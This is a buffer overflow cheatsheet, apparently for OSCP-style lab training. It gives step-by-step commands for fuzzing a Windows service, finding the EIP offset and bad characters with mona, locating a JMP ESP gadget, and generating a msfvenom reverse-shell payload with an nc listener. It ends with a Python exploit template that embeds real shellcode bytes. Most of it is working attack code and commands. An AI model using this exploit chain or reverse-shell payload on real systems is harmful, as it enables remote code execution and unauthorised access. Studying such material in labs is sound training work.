buffer-overflow-guide.md
Buffer Overflow Cheatsheet

Table of Contents

Fuzz the App

USER=admin
PASS=password
TARGET=???
xfreerdp /u:$USER /p:$PASS /cert:ignore /workarea /v:$TARGET
cd exploits
vim fuzzer.py # update the IP variable
python fuzzer.py

# output

Find the EIP Register

msf-pattern_create -l ???

# output
# restart the app first
vim exploit.py # PAYLOAD: (output above)
python exploit.py

# output
!mona findmsp -distance ???

# output

Identify Bad Characters

bytearray 

# output
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
# restart the app first
vim exploit.py # OFFSET: ???, PAYLOAD: (output above), RETN: "BBBB"
python exploit.py

# output
!mona config -set workingfolder c:\mona\%p

# output
0BADF00D   [+] Command used:
0BADF00D   !mona config -set workingfolder c:\mona\%p
0BADF00D   Writing value to configuration file
0BADF00D   Old value of parameter workingfolder =
0BADF00D   [+] Creating config file, setting parameter workingfolder
0BADF00D   New value of parameter workingfolder =  c:\mona\%p
0BADF00D
0BADF00D   [+] This mona.py action took 0:00:00
!mona bytearray -b "\x00"

# output
0BADF00D   [+] Command used:
0BADF00D   !mona bytearray -b "\x00"
0BADF00D    *** Note: parameter -b has been deprecated and replaced with -cpb ***
0BADF00D   Generating table, excluding 1 bad chars...
0BADF00D   Dumping table to file
0BADF00D   [+] Preparing output file 'bytearray.txt'
0BADF00D       - Creating working folder c:\mona\oscp
0BADF00D       - Folder created
0BADF00D       - (Re)setting logfile c:\mona\oscp\bytearray.txt
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
0BADF00D
0BADF00D   Done, wrote 255 bytes to file c:\mona\oscp\bytearray.txt
0BADF00D   Binary output saved in c:\mona\oscp\bytearray.bin
0BADF00D
0BADF00D   [+] This mona.py action took 0:00:00.016000
!mona compare -f C:\mona\oscp\bytearray.bin -a ???

# output
# repeat the following until "Status = Unmodified": 
#   start app
#   send exploit
#   generate a new byte array
#   compare to ESP
#   remove bad characters (look at the Comparison Results table in the Log data window, remove the characters underlined by "0a")

# ESP     , BADCHARS
# 0188FA30, "\x00\x??\x??\x??\x??"

vim exploit.py # BADCHARS = "\x00\x??\x??\x??\x??"
python exploit.py

# output
!mona compare -f c:\mona\oscp\bytearray.bin -a ???

# output

Find a JMP Instruction

!mona jmp -r esp -cpb "???"

# output
# ADDRESS: "???" # address of JMP instruction
# RETN: "???" # address of JMP instruction, in Little Endian

Generate a Payload

ip address
LHOST=10.10.10.69 # USE YOUR IP ADDRESS!
BADCHARS="\x00\x??\x??\x??\x??" 
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=443 -f python -v PAYLOAD EXITFUNC=thread -b $BADCHARS

# output

Send the Exploit

# restart the app first
vim exploit.py # RETN: (address of JMP instruction found), PAYLOAD: (output above), PADDING: "\x90" * 16
python exploit.py

# output
sudo nc -nvlp 443

# output

Exploit

#!/usr/bin/env python3
"""Exploit template for the stack-overflow walkthrough above.

Builds a single request, PREFIX + OVERFLOW + RETN + PADDING + PAYLOAD +
SUFFIX, opens one TCP connection to TARGET, sends it, reads up to 1024
bytes of reply and closes. Every ``???`` is a placeholder whose value the
preceding guide sections tell you how to determine; the file is not valid
Python until all of them are replaced.

Mitigation note: as written this depends on a JMP ESP gadget sitting at a
fixed, non-randomised address and on the shellcode running from the stack,
so a target built with ASLR, DEP/NX and stack cookies defeats the template.
"""

import socket

IP = "10.10.10.23" # change me
PORT = 1337 # change me
TARGET = (IP,PORT) # (host, port) tuple handed straight to socket.connect()
PREFIX = "OVERFLOW0 " # change me; vulnerable function of target
OFFSET = ??? # change me; fuzz the target to determine the correct value
OVERFLOW = "A" * OFFSET # bogus chars that precede the return address (RETN below)
RETN = "???" # address of a JMP instruction, in Little Endian
PADDING = "\x90" * 16 # so the msfvenom encoder does not overwrite itself
BADCHARS = "???" # exclude these from your shellcode
# msfvenom -p windows/shell_reverse_tcp LHOST=??? LPORT=443 -f python -v PAYLOAD EXITFUNC=thread -b "???"
# The bytes below are whatever the msfvenom command above emitted; they are
# sample output and must be regenerated for your own LHOST and BADCHARS.
PAYLOAD =  b""
PAYLOAD += b"\xfc\xbb\xcc\xfa\xd6\x3b\xeb\x0c\x5e\x56\x31\x1e"
PAYLOAD += b"\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff"
PAYLOAD += b"\xff\x30\x12\x54\x3b\xc8\xe3\x39\xb5\x2d\xd2\x79"
PAYLOAD += b"\xa1\x26\x45\x4a\xa1\x6a\x6a\x21\xe7\x9e\xf9\x47"
PAYLOAD += b"\x20\x91\x4a\xed\x16\x9c\x4b\x5e\x6a\xbf\xcf\x9d"
PAYLOAD += b"\xbf\x1f\xf1\x6d\xb2\x5e\x36\x93\x3f\x32\xef\xdf"
PAYLOAD += b"\x92\xa2\x84\xaa\x2e\x49\xd6\x3b\x37\xae\xaf\x3a"
PAYLOAD += b"\x16\x61\xbb\x64\xb8\x80\x68\x1d\xf1\x9a\x6d\x18"
PAYLOAD += b"\x4b\x11\x45\xd6\x4a\xf3\x97\x17\xe0\x3a\x18\xea"
PAYLOAD += b"\xf8\x7b\x9f\x15\x8f\x75\xe3\xa8\x88\x42\x99\x76"
PAYLOAD += b"\x1c\x50\x39\xfc\x86\xbc\xbb\xd1\x51\x37\xb7\x9e"
PAYLOAD += b"\x16\x1f\xd4\x21\xfa\x14\xe0\xaa\xfd\xfa\x60\xe8"
PAYLOAD += b"\xd9\xde\x29\xaa\x40\x47\x94\x1d\x7c\x97\x77\xc1"
PAYLOAD += b"\xd8\xdc\x9a\x16\x51\xbf\xf2\xdb\x58\x3f\x03\x74"
PAYLOAD += b"\xea\x4c\x31\xdb\x40\xda\x79\x94\x4e\x1d\x7d\x8f"
PAYLOAD += b"\x37\xb1\x80\x30\x48\x98\x46\x64\x18\xb2\x6f\x05"
PAYLOAD += b"\xf3\x42\x8f\xd0\x54\x12\x3f\x8b\x14\xc2\xff\x7b"
PAYLOAD += b"\xfd\x08\xf0\xa4\x1d\x33\xda\xcc\xb4\xce\x8d\xf8"
PAYLOAD += b"\x40\x30\xfc\x95\x52\xb0\xfe\xde\xda\x56\x6a\x31"
PAYLOAD += b"\x8b\xc1\x03\xa8\x96\x99\xb2\x35\x0d\xe4\xf5\xbe"
PAYLOAD += b"\xa2\x19\xbb\x36\xce\x09\x2c\xb7\x85\x73\xfb\xc8"
PAYLOAD += b"\x33\x1b\x67\x5a\xd8\xdb\xee\x47\x77\x8c\xa7\xb6"
PAYLOAD += b"\x8e\x58\x5a\xe0\x38\x7e\xa7\x74\x02\x3a\x7c\x45"
PAYLOAD += b"\x8d\xc3\xf1\xf1\xa9\xd3\xcf\xfa\xf5\x87\x9f\xac"
PAYLOAD += b"\xa3\x71\x66\x07\x02\x2b\x30\xf4\xcc\xbb\xc5\x36"
PAYLOAD += b"\xcf\xbd\xc9\x12\xb9\x21\x7b\xcb\xfc\x5e\xb4\x9b"
PAYLOAD += b"\x08\x27\xa8\x3b\xf6\xf2\x68\x5b\x15\xd6\x84\xf4"
PAYLOAD += b"\x80\xb3\x24\x99\x32\x6e\x6a\xa4\xb0\x9a\x13\x53"
PAYLOAD += b"\xa8\xef\x16\x1f\x6e\x1c\x6b\x30\x1b\x22\xd8\x31"
PAYLOAD += b"\x0e\x22\xde\xcd\xb1"
SUFFIX = "" 
# Segment order is fixed: OFFSET bytes of filler, then RETN, then the
# 16-byte NOP padding and the shellcode.
EXPLOIT = PREFIX + OVERFLOW + RETN + PADDING + PAYLOAD + SUFFIX

print("[*] Attacking: %s" % IP)
try:
    CLIENT = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    CLIENT.settimeout(3) # 3 s cap on connect/send/recv; a timeout lands in the except below
    CLIENT.connect(TARGET)
    CLIENT.send(EXPLOIT) # one send(); a short write is neither detected nor retried
    CLIENT.recv(1024) # reply (up to 1024 bytes) is read and discarded
    CLIENT.close() # only reached on success; on the error path the socket is never closed explicitly
    print("[+] Sent exploit.")
except socket.error as ERROR:
    # socket.timeout is a subclass of socket.error, so a hung target is
    # reported with the same message as a refused connection. ERROR is
    # bound but never used, so the underlying reason is not shown.
    print("[!] Failed to connect.")
    exit()